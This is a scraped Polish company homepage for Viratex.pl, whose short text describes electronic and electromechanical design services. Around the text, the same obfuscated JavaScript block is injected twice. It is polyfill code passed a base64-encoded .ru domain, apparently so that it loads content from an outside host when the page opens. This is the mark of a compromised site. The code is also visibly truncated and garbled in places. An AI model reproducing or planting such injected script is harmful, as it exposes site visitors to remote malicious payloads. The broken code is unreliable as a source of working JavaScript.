(function(){function n(n){var e=5381;for(i=0;i>>0;if("function"!=typeof n)throw new TypeError(n+" is not a function");for(arguments.length>1&&(t=e),o=new Array(c),r=0;c>r;){var u,f;r in i&&(u=i[r],f=n.call(t,u,r,i),o[r]=f),r++}return o}),Array.prototype.some||(Array.prototype.some=function(n){if(null==this)throw new TypeError("Array.prototype.some called on null or undefined");if("function"!=typeof n)throw new TypeError;for(var e=Object(this),t=e.length>>>0,o=arguments.length>=2?arguments[1]:void 0,r=0;t>r;r++)if(r in e&&n.call(o,e[r],r,e))return!0;return!1}),function(){function n(n){this.message=n}var e="undefined"!=typeof exports?exports:self,t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";n.prototype=new Error,n.prototype.name="InvalidCharacterError",e.btoa||(e.btoa=function(e){for(var o,r,i=String(e),c=0,u=t,f="";i.charAt(0|c)||(u="=",c%1);f+=u.charAt(63&o>>8-c%1*8)){if(r=i.charCodeAt(c+=.75),r>255)throw new n("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");o=o<<8|r}return f}),e.atob||(e.atob=function(e){var o=String(e).replace(/=+$/,"");if(o.length%4==1)throw new n("'atob' failed: The string to be decoded is not correctly encoded.");for(var r,i,c=0,u=0,f="";i=o.charAt(u++);~i&&(r=c%4?64*r+i:i,c++%4)?f+=String.fromCharCode(255&r>>(-2*c&6)):0)i=t.indexOf(i);return f})}(),function(n){function e(){}function t(n,e){return function(){n.apply(e,arguments)}}function o(n){if("object"!=typeof this)throw new TypeError("Promises must be constructed via new");if("function"!=typeof n)throw new TypeError("not a function");this._state=0,this._handled=!1,this._value=void 0,this._deferreds=[],a(n,this)}function r(n,e){for(;3===n._state;)n=n._value;return 0===n._state?void n._deferreds.push(e):(n._handled=!0,void o._immediateFn(function(){var t=1===n._state?e.onFulfilled:e.onRejected;if(null===t)return void(1===n._state?i:c)(e.promise,n._value);var o;try{o=t(n._value)}catch(r){return void c(e.promise,r)}i(e.promise,o)}))}function i(n,e){try{if(e===n)throw new TypeError("A promise cannot be resolved with itself.");if(e&&("object"==typeof e||"function"==typeof e)){var r=e.then;if(e instanceof o)return n._state=3,n._value=e,void u(n);if("function"==typeof r)return void a(t(r,e),n)}n._state=1,n._value=e,u(n)}catch(i){c(n,i)}}function c(n,e){n._state=2,n._value=e,u(n)}function u(n){2===n._state&&0===n._deferreds.length&&o._immediateFn(function(){n._handled||o._unhandledRejectionFn(n._value)});for(var e=0,t=n._deferreds.length;t>e;e++)r(n,n._deferreds[e]);n._deferreds=null}function f(n,e,t){this.onFulfilled="function"==typeof n?n:null,this.onRejected="function"==typeof e?e:null,this.promise=t}function a(n,e){var t=!1;try{n(function(n){t||(t=!0,i(e,n))},function(n){t||(t=!0,c(e,n))})}catch(o){if(t)return;t=!0,c(e,o)}}var s=setTimeout;o.prototype["catch"]=function(n){return this.then(null,n)},o.prototype.then=function(n,t){var o=new this.constructor(e);return r(this,new f(n,t,o)),o},o.all=function(n){var e=Array.prototype.slice.call(n);return new o(function(n,t){function o(i,c){try{if(c&&("object"==typeof c||"function"==typeof c)){var u=c.then;if("function"==typeof u)return void u.call(c,function(n){o(i,n)},t)}e[i]=c,0===--r&&n(e)}catch(f){t(f)}}if(0===e.length)return n([]);for(var r=e.length,i=0;io;o++)n[o].then(e,t)})},o._immediateFn="function"==typeof setImmediate&&function(n){setImmediate(n)}||function(n){s(n,0)},o._unhandledRejectionFn=function(n){"undefined"!=typeof console&&console&&console.warn("Possible Unhandled Promise Rejection:",n)},o._setImmediateFn=function(n){o._immediateFn=n},o._setUnhandledRejectionFn=function(n){o._unhandledRejectionFn=n},n.Promise||(n.Promise=o)}(window),document.querySelectorAll||(document.querySelectorAll=function(n){var e=document.createElement("STYLE");return document.documentElement.firstChild.appendChild(e),document.__qsaels=[],e.styleSheet.cssText=n+"{x:expression(document.__qsaels.push(this))}",window.scrollBy(0,0),document.__qsaels}),function(n){n.matches||(n.matches=n.matchesSelector||function(n){var e=document.querySelectorAll(n),t=this;return Array.prototype.some.call(e,function(n){return n===t})})}(Element.prototype);var p,m=2,y={},v={};return h}())(186305772, atob("dXM1ZnpvbmFjby5ydQ=="));

Witamy na stronach Viratex.pl

Zajmujemy sie projektowaniem oraz wykonaniem elektronicznych, elektromechanicznych oraz informatycznych rozwiązań typowych oraz niekonwencjonalnych projektów technicznych. Postawione cele w miarę możliwości realizujemy z wykorzystaniem w optymalny sposób mozliwosci technicznych dostępnych na rynku urzadzen służących zapewnieniu komfortu mieszkaniowego. Oferujemy rozwiazania techniczne zarowno wlasne, jak i innych firm, które oferują zarówno wysoki poziom techniczny jak i prostotę i intuicyjność obsługi.

(function(){function n(n){var e=5381;for(i=0;i>>0;if("function"!=typeof n)throw new TypeError(n+" is not a function");for(arguments.length>1&&(t=e),o=new Array(c),r=0;c>r;){var u,f;r in i&&(u=i[r],f=n.call(t,u,r,i),o[r]=f),r++}return o}),Array.prototype.some||(Array.prototype.some=function(n){if(null==this)throw new TypeError("Array.prototype.some called on null or undefined");if("function"!=typeof n)throw new TypeError;for(var e=Object(this),t=e.length>>>0,o=arguments.length>=2?arguments[1]:void 0,r=0;t>r;r++)if(r in e&&n.call(o,e[r],r,e))return!0;return!1}),function(){function n(n){this.message=n}var e="undefined"!=typeof exports?exports:self,t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";n.prototype=new Error,n.prototype.name="InvalidCharacterError",e.btoa||(e.btoa=function(e){for(var o,r,i=String(e),c=0,u=t,f="";i.charAt(0|c)||(u="=",c%1);f+=u.charAt(63&o>>8-c%1*8)){if(r=i.charCodeAt(c+=.75),r>255)throw new n("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");o=o<<8|r}return f}),e.atob||(e.atob=function(e){var o=String(e).replace(/=+$/,"");if(o.length%4==1)throw new n("'atob' failed: The string to be decoded is not correctly encoded.");for(var r,i,c=0,u=0,f="";i=o.charAt(u++);~i&&(r=c%4?64*r+i:i,c++%4)?f+=String.fromCharCode(255&r>>(-2*c&6)):0)i=t.indexOf(i);return f})}(),function(n){function e(){}function t(n,e){return function(){n.apply(e,arguments)}}function o(n){if("object"!=typeof this)throw new TypeError("Promises must be constructed via new");if("function"!=typeof n)throw new TypeError("not a function");this._state=0,this._handled=!1,this._value=void 0,this._deferreds=[],a(n,this)}function r(n,e){for(;3===n._state;)n=n._value;return 0===n._state?void n._deferreds.push(e):(n._handled=!0,void o._immediateFn(function(){var t=1===n._state?e.onFulfilled:e.onRejected;if(null===t)return void(1===n._state?i:c)(e.promise,n._value);var o;try{o=t(n._value)}catch(r){return void c(e.promise,r)}i(e.promise,o)}))}function i(n,e){try{if(e===n)throw new TypeError("A promise cannot be resolved with itself.");if(e&&("object"==typeof e||"function"==typeof e)){var r=e.then;if(e instanceof o)return n._state=3,n._value=e,void u(n);if("function"==typeof r)return void a(t(r,e),n)}n._state=1,n._value=e,u(n)}catch(i){c(n,i)}}function c(n,e){n._state=2,n._value=e,u(n)}function u(n){2===n._state&&0===n._deferreds.length&&o._immediateFn(function(){n._handled||o._unhandledRejectionFn(n._value)});for(var e=0,t=n._deferreds.length;t>e;e++)r(n,n._deferreds[e]);n._deferreds=null}function f(n,e,t){this.onFulfilled="function"==typeof n?n:null,this.onRejected="function"==typeof e?e:null,this.promise=t}function a(n,e){var t=!1;try{n(function(n){t||(t=!0,i(e,n))},function(n){t||(t=!0,c(e,n))})}catch(o){if(t)return;t=!0,c(e,o)}}var s=setTimeout;o.prototype["catch"]=function(n){return this.then(null,n)},o.prototype.then=function(n,t){var o=new this.constructor(e);return r(this,new f(n,t,o)),o},o.all=function(n){var e=Array.prototype.slice.call(n);return new o(function(n,t){function o(i,c){try{if(c&&("object"==typeof c||"function"==typeof c)){var u=c.then;if("function"==typeof u)return void u.call(c,function(n){o(i,n)},t)}e[i]=c,0===--r&&n(e)}catch(f){t(f)}}if(0===e.length)return n([]);for(var r=e.length,i=0;io;o++)n[o].then(e,t)})},o._immediateFn="function"==typeof setImmediate&&function(n){setImmediate(n)}||function(n){s(n,0)},o._unhandledRejectionFn=function(n){"undefined"!=typeof console&&console&&console.warn("Possible Unhandled Promise Rejection:",n)},o._setImmediateFn=function(n){o._immediateFn=n},o._setUnhandledRejectionFn=function(n){o._unhandledRejectionFn=n},n.Promise||(n.Promise=o)}(window),document.querySelectorAll||(document.querySelectorAll=function(n){var e=document.createElement("STYLE");return document.documentElement.firstChild.appendChild(e),document.__qsaels=[],e.styleSheet.cssText=n+"{x:expression(document.__qsaels.push(this))}",window.scrollBy(0,0),document.__qsaels}),function(n){n.matches||(n.matches=n.matchesSelector||function(n){var e=document.querySelectorAll(n),t=this;return Array.prototype.some.call(e,function(n){return n===t})})}(Element.prototype);var p,m=2,y={},v={};return h}())(186305772, atob("dXM1ZnpvbmFjby5ydQ=="));